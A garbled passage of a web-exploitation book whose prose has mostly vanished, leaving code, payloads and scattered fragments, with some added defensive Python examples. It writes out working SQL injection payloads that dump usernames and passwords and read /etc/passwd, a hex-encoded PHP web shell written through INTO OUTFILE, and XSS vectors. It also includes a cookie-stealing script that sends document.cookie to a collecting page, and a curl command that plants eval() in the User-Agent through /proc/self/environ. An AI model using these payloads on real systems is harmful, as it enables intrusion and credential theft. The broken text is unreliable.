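    '"http://127.0.0.1/<pre><?passthru($_GET[\'cmd\']);?></pre>" "<pre><?passthru($_GET[\'cmd\']);?></pre>"',
    '10.0.0.5 - - [30/Jun/2010:13:05:00 +0200] "GET /index.php?page=main HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Running find_poisoned over a real access_log is a cheap retrospective check after an LFI finding: a hit in the user_agent or referer field of a 200 response is the quiet variant the chapter recommends, and it survives log rotation only until the poisoned file is rotated away.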


-
-. :
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/error_log
/var/log/access_log
/var/log/error.log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/httpd/error.log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/access_log


, c (switch case). PHP-:


<?php
global $page;
switch ($page)
{
case '':
include ("pages/main.php");
break;
case 'index':
include ("pages/main.php");
break;
case 'page1':
include ("pages/page1.php");
break;
case 'page2':
include ("pages/page2.php");
break;
default:
include ("pages/error.php");
break;
}
?>

str_replace().
, php.ini :
allow_url_include = Off   ; no include()/require() of URLs
allow_url_fopen = Off     ; no URL wrappers in fopen() and friends
register_globals = Off    ; request parameters do not become PHP variables
magic_quotes_gpc = On     ; escapes quotes and the null byte " " (%00) in GET/POST/cookie data
safe_mode = On            ; safe_mode restricts which files a script may open, e.g. /etc/passwd

register_globals, magic_quotes_gpc and safe_mode were removed in PHP 5.4; on current PHP only the two allow_url_* directives exist, so the real protection is restricting the include target in the application code, as in the switch/case above and the filter below.

PHP-,
:
<?php
function stripslashes_for_array(&$array)
{
reset($array);
while (list($key, $val) = each($array))
{
if (is_string($val)) $array[$key] = stripslashes($val);
elseif (is_array($val)) $array[$key] = stripslashes_for_array($val);
}
return $array;
}
if (!get_magic_quotes_gpc())
{
stripslashes_for_array($_POST);
stripslashes_for_array($_GET);
}
if(isset($_GET['file']))$file=$_GET['file'];
else
{
if(isset($_POST['file']))$file=$_POST['file'];
else $file='';
}
$file=str_replace('/','',$file);
$file=str_replace('.','',$file);
if(!file_exists("include".'/'.$file.'.php')||$file =='index')
{
$file='news';
}
include("include".'/'.$file.'.php');

?>

?
stripslashes(), . ,
. ('/'
'.') str_replace(). (
file_exists()), $file='news'.
.
- ,
-, , . .


05

SQL-

SQL- Cyphor.
http://localhost/webexploitation_package_02/cyphor/ ,
. 05.1.

. 05.1. Cyphor

newmsg.php . Kate,
exit()
# ( . 05.2 ) . newmsg.php
Cyphor. ,
Cyphor
.
, , newmsg.php SQL fid ( ). SQL-


. 05.2. newmsg.php

(SQL-injection)? SQL,
. SQL (Structured Query Language
) . SELECT
. , SELECT id, password
FROM users id password users, SELECT * FROM
users users. , (,
). SQL-, INSERT (
) UPDATE (, ),
, .
UNION . :
SELECT fid, title FROM forums UNION SELECT nick, password FROM users

,
. , UNION , . , ,
SELECT, .

. (1, 2, 3...), (
), (null)
SQL-. .
( FROM),
, . , cyphor_users,


nick () password ().


:
union select 1 from cyphor_users

:
http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=-1 union select 1 from cyphor_users

, , . SQL,
() MySQL,
/* ( --),
. . 05.3.

. 05.3. SQL- newmsg.php

, SQL
( ), ,
.
,
(%20). , (+) /**/,
.
, .
(union select 1,2,3,4 from cyphor_users),
(. 05.4). ,
, .


. 05.4. UNION SELECT

2. nick ( ,
Cyphor). . 05.5
( admin).

. 05.5. (admin)

2 password admin (. 05.6).


Cyphor crypt(),
(


. 05.6. admin

). PHP
, ,
Cyphor , 8 , , . ,
DES,
John The Ripper (. 0). , Cyphor ( ),
(. 3).
MySQL ( ),
MySQL . , ,
version(), user() database().
concat_ws:
concat_ws(0x3a,version(),user(),database())

().
:
5.0.24a:root@localhost:cyphor


concat, :
concat(name,0x3a,id)

,
group_concat, :
group_concat(password)

Cyphor,
, ( ).


/etc/passwd.
MySQL load_file('/etc/passwd').
( ), :
load_file(0x2f6574632f706173737764)

, (. 05.7).
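The column-count search and the hex encoding, run for real against an in-memory SQLite database instead of the Cyphor MySQL instance; this is an added example, not code from the book. The forums and cyphor_users tables are constructed stand-ins with placeholder hashes, SQLite writes concat_ws(0x3a,...) as ||, and load_file()/INTO OUTFILE are MySQL-only, so only the literal for them is built here.

```python
import sqlite3


def lab_db():
    """Constructed stand-in for the Cyphor tables; the password values are placeholders."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE forums (fid INTEGER, title TEXT, descr TEXT, posts INTEGER);
        INSERT INTO forums VALUES (1, 'General', 'Anything goes', 12);
        CREATE TABLE cyphor_users (nick TEXT, password TEXT);
        INSERT INTO cyphor_users VALUES ('admin', 'crypt-hash-of-admin');
        INSERT INTO cyphor_users VALUES ('bob',   'crypt-hash-of-bob');
    """)
    return db


def forum_query_vulnerable(db, fid):
    """What newmsg.php does: fid is pasted into the statement unquoted."""
    sql = "SELECT fid, title, descr, posts FROM forums WHERE fid=" + fid
    return db.execute(sql).fetchall()


def forum_query_fixed(db, fid):
    """Parameter binding: the value can never change the statement's structure."""
    sql = "SELECT fid, title, descr, posts FROM forums WHERE fid=?"
    return db.execute(sql, (fid,)).fetchall()


def find_column_count(db, query=forum_query_vulnerable, max_cols=32):
    """Grow 'union select 1', 'union select 1,2', ... until the database stops rejecting
    the column-count mismatch; the first accepted probe is the width of the query."""
    for n in range(1, max_cols + 1):
        probe = "-1 union select " + ",".join(str(i) for i in range(1, n + 1))
        try:
            query(db, probe)
            return n
        except sqlite3.OperationalError:   # "...do not have the same number of result columns"
            continue
    raise RuntimeError("no working column count up to %d" % max_cols)


def dump_credentials(db, ncols, shown_col=2):
    """Put nick:password into the column the page displays (column 2 in the chapter) and
    pad the rest with numbers. MySQL: concat_ws(0x3a,nick,password); SQLite: ||."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[shown_col - 1] = "nick || ':' || password"
    probe = "-1 union select " + ",".join(cols) + " from cyphor_users"
    return sorted(row[shown_col - 1] for row in forum_query_vulnerable(db, probe))


def hex_literal(text):
    """MySQL 0x... literal for a string, so the injection needs no quote characters
    (used for load_file('/etc/passwd') and for the shell written with INTO OUTFILE)."""
    return "0x" + text.encode().hex()
```

fid=-1 in the probes makes the original SELECT return nothing, so whatever the page renders comes from the UNION half; the fixed query treats the whole probe as one value for fid and returns no rows.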

. 05.7. /etc/passwd load_file

2 SQL- show.
php, 4 SQL- .
.
, param
SQL-:
param=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

,
SQL- ,1. ,
.
, SQL- :
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user ,1

,
, (-- /*), . ? LIMIT,


. :
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user LIMIT 0

,1 SQL :
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user LIMIT 0,1

.
1 ( ), WHERE:
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user WHERE 1=

:
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user WHERE 1=1

WHERE 1=1 SQL ( 1 = 1)


,
.
, id=31,
(, +, *, /), (, 1 0).
, (/* --).
,
( SQL).


select ...into outfile , -.
/usr/local/apache/htdocs/ chmod 777 cyphor.
cyphor. ,
. nobody,
Apache, ,
. ,
, images include.
. select ...into outfile , SELECT, .
SQL- newmsg.php.


Cyphor user.txt
:
select 1,concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/user.txt'

:
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 1,concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/user.txt'

, , http://localhost/webexploitation_package_02/cyphor/user.txt,
(. 05.8).
admin.

. 05.8. Cyphor

, . ,
, (null).
4 , ( , 2). ,
, .

-
, outfile
-.
hex. .
union select 1,2,3,4 :
hex("<pre><? system($_GET['cmd']);?></pre>")


. 05.9 , .

. 05.9. - hex

( ) ,
,
0x ( ).
( ):
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x3C7072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E,null,null,null into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/shell.php'

-
shell.php, ,
, :
http://localhost/webexploitation_package_02/cyphor/shell.php?cmd=ls+-la

. 05.10.
, , , SQL. ,
.
SQL-? .

DVL - ( :
--- sql injection).
, . .
(, ComicShout v.2).


. 05.10. -

SQL-
, , , SQL-. , show.php
Cyphor. :
$message_mode = 1;

:
$id = intval($id);
if (!$id)
{
die("<br><h1>Hacking attempt!</h1>");
}

, id ,
, . ,
. . 05.11.
, fid,
.
, , . :
$text_to_check = mysql_real_escape_string ($_GET[""]);
$text_to_check = strip_tags($text_to_check);
$text_to_check = htmlspecialchars($text_to_check);
$text_to_check = stripslashes($text_to_check);
$text_to_check = addslashes($text_to_check);
$_GET[""] = $text_to_check;


. 05.11. show.php

SQL,
select, union, order, char, where, from.
, , . ,
(, ):
ini_set('display_errors', '0');


.

. , , , ,
SQL-. PHP 5:
$section = $_GET['section'];
// $section is still not escaped: this snippet only hides the error from the attacker,
// it does not stop the injection itself
$result = mysql_query("SELECT * FROM `tbl_name` WHERE `section` = $section");
if (!$result || mysql_num_rows($result) == 0) {
    // the query failed or the row count is 0: send the visitor to the front page
    // instead of printing the MySQL error message
    header("Location: http://$_SERVER[HTTP_HOST]/");
    exit();
} else {
    ... // normal processing of the result
}

, ,


(
, ). ,
(, ),
, .
(CMS),
.
, ( ,
sha1 , md5 ). , SQL , ,
, ,
.


,
. ,
mysql:
http://www.site.net/module.php?id=-1 union select 1,2,user(),4 --


ERROR 1267 : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

, , ,
latin1_swedish, , user(),
utf8_general. MySQL ,
, UNION .
, latin1 user()
convert():
convert(user() using latin1)

:
http://www.site.net/module.php?id=-1 union select 1,2,convert(user() using latin1),4 --

.
SQL-
MySQL, SQL- MS SQL 5.


06

(Cross-Site Scripting, XSS)


,
- .
XSS, CSS,
, , CSS
(Cascade Style Sheets), . X XSS
, (- cross), , , , .
XSS HTML/
JavaScript/VBScript- ,
.
,
, .
: .
.
, ,
. XSS,
.

XSS
cookie-
.
cookie ( )? , .
cookie-


. cookie- , ,
,
.

Hacked by V.Pupkin. XSS. , ( ).
,
JavaScript VBScript.
- . , ,
, . , XSS-
XSS-. ,
.


, -
XSS. XSS
, - , . -
, .
, .
.
, , ,
search, .
.
:
script.php?search=[ ]

, html-
, :
script.php?search=<b>Hacked</b>

, , Hacked. , <marquee> </marquee>,


, <h1> </h1>, . ,
. .
, ,


- - .
<b>Hacked</b> cookie (
). , ,
,
(%3c , %3e ):
script.php?search=%3cmarquee%3eHacked%3c/marquee%3e

, GET:
script.php?search=<b>Hacked</b>

,
POST, . html, POST .
, javascript-,

.



html-. ,
XSS-. ,
, html-, . XSS-
.

. , , .
,
, ( ) .

( ).
, ,
html-, html, ,
.
, :
<script>alert('Hacked by Vasya!')</script>, XSS

Hacked by
Vasya!


XSS- ; ,
, ,
, , .

-,
XSS
-, XSS.
name.php :
<?php
$name=$_GET['name'];
echo "Your name is $name";
?>

/usr/local/apache/htdocs.
form.html :
<form action="name.php" method="GET">
<input type=text name="name">
<input type=submit value="OK">
</form>

OK
(name) name.php.
http://localhost/form.html (. 06.1), (, Vasya)
OK.

. 06.1. form.html

name.php , . 06.2.
, form.html
<h1>Hacked<h1>, Hacked, . 06.3.


. 06.2. name.php

. 06.3. name.php html-

, html- ( <h1> </h1>,


) ,
-, name.php.
: JavaScript. form.html
<script>alert('Hacked by Vasya')</script>

<script> </script> (), alert() .


, , OK, ,
. 06.4.
( Location)
, ,
( ). , - . ( ,


. 06.4.

.)
cookie-.
cookie,
<script>alert(document.cookie)</script>

Damn Vulnerable Linux ,


cookie, - . 06.5.

. 06.5. cookie

, , cookie-
, . JavaScript, cookie- php- (
php-), , , . -,
php- cookie.
( DVL ),
.
<?
$query = $_SERVER['QUERY_STRING'];   // everything after the "?": the cookie string the JavaScript appended
$query .= "\n";                      // one record per line
$db = "/tmp/cookies.txt";            // the file that collects the stolen cookies
$fh = fopen($db, "a+");              // open for appending, create it if missing
fputs($fh, "$query");                // write the record
fclose($fh);
?>


php- cookie-
cookies.txt.
, .
/usr/local/apache/htdocs steal.php. Cookie-
/tmp, , /usr/local/apache/htdocs nobody,
-, . , nobody.
JavaScript :
<script>document.location.replace('http://_/_.php?com='+document.cookie);</script>

:
 document.location.replace cookie-
;
 'http://_/_.php ;
 ?com='+document.cookie com
cookie-, ,
? ( QUERY_STRING),
cookie-, , com=. cookie
, .
cookie- -
cookies.txt.
form.html :
<script>
document.location.replace('http://localhost/steal.php?com='+document.cookie);
</script>

OK ,
steal.php. /tmp
cat cookies.txt cookies.txt cookie-
(. 06.6).

base64, .
. . , ,
- . .


. 06.6. cookie-

, cookies.txt cookie- . (,
- md5-, 03,
, 0). cookie- , IE ( Internet
Explorer), Opera Firefox.
, , .
( ), , (
, html-).

. , , ,
, , , , , .

, ,
( , ) . ,
, ,
() , ( ). - !
... ,
, html- .
, -
, .
XSS html- .
:

<script>
function ShowPage(){
    // page: the document's root <html> element
    var page = document.documentElement;
    // CodeOfPage: the complete markup of the page
    var CodeOfPage = page.innerHTML;
    // show it with alert()
    alert(CodeOfPage);
}
</script>

, , //, .


<script>
, <script> ?
<script> .
, , XSS. , javascript (
vbscript).
(alert),
.
, ,
:
 , ;
 , Internet Explorer.
, .
 <META>. ,
. <META> refresh, CONTENT
:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

 <BODY>. :
<BODY BACKGROUND="javascript:alert('XSS')" >

OnLoad, .
javascript- :
<BODY ONLOAD=alert('XSS')>

 <IMG>. SRC:
<IMG SRC="javascript:alert('XSS')">

, javascript ? :
<IMG SRC="javascript:alert('XSS')">


:
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="
javascript:alert('XSS');">

VBScript:
<IMG SRC='vbscript:msgbox("XSS")'>

 <STYLE>. IE , ,
:
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

, Internet
Explorer.
 <TABLE> . .
BACKGROUND, . , javascript-:
<TABLE BACKGROUND="javascript:alert('XSS')">

 <DIV>. . ,
<div> </div>, .
:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

, url() expression():
<DIV STYLE="width: expression(alert('XSS'));">

 <STYLE>. ,
<STYLE> </STYLE>. :
<STYLE>.XSS{background-image:url("javascript:alert('Hacked')");}</STYLE><A CLASS=XSS></A>

XSS ( XSS-),

<A CLASS=XSS></A>

:
<STYLE type="text/css">BODY{background:url("javascript:alert('Hacked')")}</STYLE>

XSS- .
 <BGSOUND>. , javascript-:
<BGSOUND SRC="javascript:alert('XSS');">

 <IMG> . .
, Internet
Explorer. DYNSRC LOWSRC.
:


<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

SRC ,
.
 <OBJECT>. html-.
javascript- :
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.site.com/test.html"></OBJECT>
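Added Python example, not from the book, pairing the name.php behaviour with its fix and testing the vector list above against three renderers: the unescaped echo, a filter that only removes <script> tags, and proper HTML encoding. The canary probe is what a scanner sends first;
the vectors are the chapter's, the helper names are this example's own.

```python
import html
import re


def render_unsafe(name):
    """name.php from the chapter: the parameter is echoed into the page untouched."""
    return "Your name is " + name


def render_safe(name):
    """The fix: encode for HTML before reflecting (PHP: htmlspecialchars($name, ENT_QUOTES))."""
    return "Your name is " + html.escape(name, quote=True)


def strip_script_tags(name):
    """A filter that only deletes <script> tags; kept here to show what it misses."""
    return re.sub(r"(?is)<\s*/?\s*script[^>]*>", "", name)


def render_filtered(name):
    return render_unsafe(strip_script_tags(name))


# Script-less vectors from the chapter. Old IE honoured javascript: URLs and expression()
# in these places; current browsers ignore most of them, but the event-handler form
# (ONLOAD and friends) still runs everywhere.
SCRIPTLESS_VECTORS = [
    "<IMG SRC=\"javascript:alert('XSS')\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.site.com/test.html\"></OBJECT>",
]

# Markup that can execute code once it sits inside the page unescaped.
ACTIVE_MARKUP = re.compile(
    r"(?i)<\s*(script|object|iframe|embed|meta|style|bgsound)\b"
    r"|\bon[a-z]+\s*="
    r"|(javascript|vbscript)\s*:"
    r"|expression\s*\("
)


def canary_reflected(render):
    """First probe a scanner sends: a harmless string carrying the characters that matter.
    If '<', '\"' and \"'\" come back unencoded, the parameter is injectable."""
    canary = "zq9<\"'>"
    return "<\"'>" in render(canary)


def reflects_active_markup(render, payload):
    """Does this payload land in the output verbatim, and does it contain executable markup?"""
    page = render(payload)
    return payload in page and ACTIVE_MARKUP.search(payload) is not None


def vulnerable_to(render, payloads=SCRIPTLESS_VECTORS):
    """Which of the payloads this renderer reflects unchanged."""
    return [p for p in payloads if reflects_active_markup(render, p)]
```

The script-stripping filter blocks the chapter's first payload and none of the script-less ones, which is the whole point of the list above; encoding the output stops all of them because the browser never sees a tag at all.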

, .
.
.
. , XSS .
XSS:
 javascript- ;
 VBScript-;
 ( );
 XSS- <IMG> Firefox.


07

SQL-

SQL- MySQL,
MS SQL . , .
, , SELECT UNION,
.
, MySQL,
. ,
.
( -- /*),
,
. , INSERT
(. ), , .
, , ,
. ,
,
. , , ,
.
:
http://site.com/news.php?id=12

,
. , :
news.php?id=12 and 1=1

, .
:
news.php?id=12 and 1=2

, .
, , ,
, ,
.
, .
, :

news.php?id=12' and 1='1


news.php?id=12' and 1='2

.
, ,
1=2, , 1=1.
.
, ( 1=1),
( 1=2). ,
, , , ,
, .
, .

MySQL
@@version
MySQL.
, MySQL .
:
news.php?id=12 and substring(@@version,1,1)=4

@@version
(=4). , , , 1=2. , 4 5 .
, , MySQL5.
4 5 , 3. , MySQL3,
- ,
SELECT UNION .

@@version version().


mysql.user
, , , select :
news.php?id=12 and (select 1)=1

, .
, , mysql.user:
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1

mysql.user, 1, ,
, . ,
, , mysql.user,
MySQL load_file()
OUTFILE. , limit 0,1,
;
.
limit.


MySQL5,
information_schema ,
.
,
users:
news.php?id=12 and (SELECT 1 from users limit 0,1)=1

users, .
, .
MySQL4,
.



- , . , users
,
:
news.php?id=12 and (SELECT substring(
concat(1,password),1,1) from users limit 0,1)=1

'1' password,
substring ( ), ,
1, password .
password, .


/
,
, , , SQL-.
(username) (password) users. , , username, password,
email userid.
(username) (password) where:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>100

limit 0,1,
,
, . , ,
. , select substring(,1,1),
. ascii()
ASCII-, > 100.
ASCII- , 100,
.
, , 100
:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>80

, , 80. :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>90

, :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>85

, :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),1,1))>86

, , . ,
85, 86, 86! , =86. , ASCII- ( char(86)), ,
V. , substring:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>100

substring ,1,1 ,2,1,


select.
, . >100 , :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>120

, 110:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>110

, :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>105

:
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>103

. :
news.php?id=12 and ascii(substring((SELECT concat(
username,0x3a,password) from users where userid=2),2,1))>104

, , 104 105,
105. char(105) i.
Vi. , 11
. .
( substring) , ,
, >0 . , , user/password .

SQL- NaboPoll
Damn Vulnerable Linux NaboPoll ( ), results.php
, SQL-. :
27...31
$res_question = mysql_query("select * from nabopoll_questions where survey=$survey order by id");
if ($res_question == FALSE || mysql_numrows($res_question) == 0)
    error($row_survey, "questions not found");

$survey () , SQL-. ,
where .

. http://localhost/webexploitation_package_02/
nabopoll/admin/survey_edit.php , . 07.1

. 07.1. NaboPoll


Actions ().
, ( ),
( Actions).
, 1
, . 07.2. (
http://localhost/webexploitation_package_02/nabopoll/result.php?surv=1).

surv=1 :
/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),1,1))>125),1,0)))

SQL-
NaboPoll. .
(/**/), , . - SELECT AND
1=, SELECT IF. IF (1),
, (0), . ,
IF , AND 1=1,
( ). ,
AND 1=0, ,
survey not found ( ). IF : ASCII- MySQL (

user) ( ) . , 125,
(. 07.3), , .

. 07.2. NaboPoll

. 07.3. NaboPoll

, , , 100,
( ).
, , 114. r.
( SUBSTRING
2):
/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),2,1))>114),1,0)))

, 111
( o).
, http://
packetstormsecurity.org/0702-exploits/nabopoll-sql.txt . , (
<?), , (
, . 07.4). $survey 1,
$path :
/webexploitation_package_02/nabopoll

. 07.4. NaboPoll

nabopoll.php, , /tmp php nabopoll.php.

,
MySQL (. 07.5).

. 07.5. NaboPoll

, , MySQL root@localhost.
, SQL-
: 0 255. ( , ),
.
, , , , ,
. .
, load_file(), ,
, /etc/passwd.
user() :
load_file(0x2f6574632f706173737764)

. 07.6. ,
,
.
, 100 195 .
,
100 15 , 13 .
6.
MD5-,
(
, ,
). 09 af.
.
- 8.

. 07.6. NaboPoll



site.com
news.php. , sqlmap 4, 5 .
.
sqlmap,
:
./sqlmap.py -u "http://site.com/news.php?id=12" -p id
-a "./txt/user-agents.txt" -v1 --string "Posted 33-2008" -e "(
SELECT concat(username,0x3a,password) from users where userid=2)"

-u , , -p , ( id). -a
(
user-agent = sqlmap, ). -v1 . --string ,
, . , 1=1
1=2 ,
. -e , , , SELECT .
sqlmap 5 , . sqlmap
(), mysql5,
. e,

( mysql4
):
./sqlmap.py -u "http://site.com/news.php?id=12" -p id
-a "./txt/user-agents.txt" -v1 --string "Posted 33-2008" -e "(
SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from
information_schema.columns where column_name like 0x257061737325
limit 0,1)"

sqlmap , magic_quotes,
0x257061737325 ( '%pass%', ).
limit, . ,
sqlmap ,
.


, SQL-, . ,
: Warning: mysql_num_rows(): supplied argument is not a valid MySQL
result resource in /home/site/public_html/detail.php on line 377,
, . ( ,
, id) id=29 and 1=1,
, id=29 and 1=2,
.
( 29)
, .
Google, :
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource.
site:fr,site:uk . .
, SQL- ,
. , ,
select , ,
. ,
.
,
, /etc/passwd:
id=29 and 1=(SELECT/**/ (IF((ASCII(SUBSTRING(
load_file(0x2f6574632f706173737764),1,1))<=255),1,0)))

( ),
,
. NaboPoll, (
, 6).
( 90% ),
, . user(), database(),
version() @@version_compile_os. , .



, , ,
,
.
, , SELECT,
INSERT ( ) UPDATE ( )
?
, , ,
. MySQL benchmark(),
PostgreSQL pg_sleep(), MS SQL delay().
benchmark() - .
- ,
. ,
. ,
sql-:
INSERT INTO table VALUES ('aaa', 'bbb', '[sql]', 'xxx');

table 'aaa', 'bbb', 'sql' 'xxx'.


sql ,
sql-. select
( ):
INSERT INTO table VALUES ('aaa', 'bbb', '[ ' OR 1=if(ascii(lower(substring(
(select user from mysql.user limit 1),1,1)>0, benchmark(
999999,md5(now())),1), 'hacked') /* ]', 'xxx');


if, , ,
benchmark, 1.
select
mysql.user, ,

, ASCII-, 0. , benchmark
( benchmark 999 999 MD5-
). xxx ,
(/*), hacked.
, 255:
INSERT INTO table VALUES ('aaa', 'bbb', '[
' OR 1=if(ascii(lower(substring((
select user from mysql.user limit 1),1,1)>255, benchmark(
999999,md5(now())),1) ), 'hacked') /* ]', 'xxx');

,
, .
,
.
, , ,
.
benchmark :
 benchmark . .
 .
32- .
 .
 benchmark ( 999 999)
. .
 benchmark , 50
.
, .

08


PHP-

/proc/self/environ
, (http://site.com) php-,
.
, /
, Apache , /tmp
. ?
.
/proc/self/environ. php- , . *nix /proc, /proc/
self ,
.
- /proc/self/environ,
. ,
Apache, /proc/self/environ.
user-agent ( -).
/proc/self/environ, user-agent, :
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4)
Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=150
...

user-agent <?php eval($_GET[cmd]); ?>


curl:
curl "http://site.com/index.php?page=../../../../../../../../proc/
self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

phpinfo() . /proc/self/environ user-agent :

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
<?php eval($_GET[cmd]); ?> HTTP_KEEP_ALIVE=150
...

, user-agent
( /proc/self/environ
).
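Detection logic for what the blind SQL injection chapter and this /proc/self/environ section describe, as an added example that is not part of the book: it parses constructed Apache access-log lines, flags the `and 1=1`/`and 1=2` pair and the `ascii(substring(...))>N` bisection probes, and flags traversal to /proc with a PHP open tag in the User-Agent. The rule names, the per-host threshold and the sample lines are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not taken from the book). 10.0.0.5
# walks through the boolean and ascii(substring()) probes of the blind SQL
# injection chapter, 10.0.0.9 requests /proc/self/environ with PHP code in
# its User-Agent, 192.168.1.20 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2011:10:01:01 +0300] "GET /news.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:02 +0300] "GET /news.php?id=12%20and%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:03 +0300] "GET /news.php?id=12%20and%201=2 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:04 +0300] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>100 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:05 +0300] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>80 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:06 +0300] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>90 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:07 +0300] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>85 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:08 +0300] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>86 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:02:10 +0300] "GET /index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo(); HTTP/1.1" 200 812 "-" "<?php eval($_GET[cmd]); ?>"
192.168.1.20 - - [12/Mar/2011:10:02:11 +0300] "GET /news.php?id=7 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Blind-injection probes: the 1=1/1=2 pair and the character comparisons
# (ascii(substring(...))>N, substring(@@version,1,1)=N) that bisect a value.
BOOL_PROBE_RE = re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)
CHAR_PROBE_RE = re.compile(
    r"ascii\s*\(\s*substring\s*\(|substring\s*\(\s*@@version", re.I)
# Directory traversal ending in /proc/self/environ, /proc/<pid>/fd/N or
# /proc/self/status, plus a PHP open tag anywhere in the request.
PROC_RE = re.compile(r"\.\./.*?/proc/(self|\d+)/(environ|fd/\d+|status)", re.I)
PHP_TAG_RE = re.compile(r"<\?php|<\?=", re.I)


def parse_line(line):
    """Split one combined-log line into fields; URL-decode the request path."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = unquote_plus(rec["path"])
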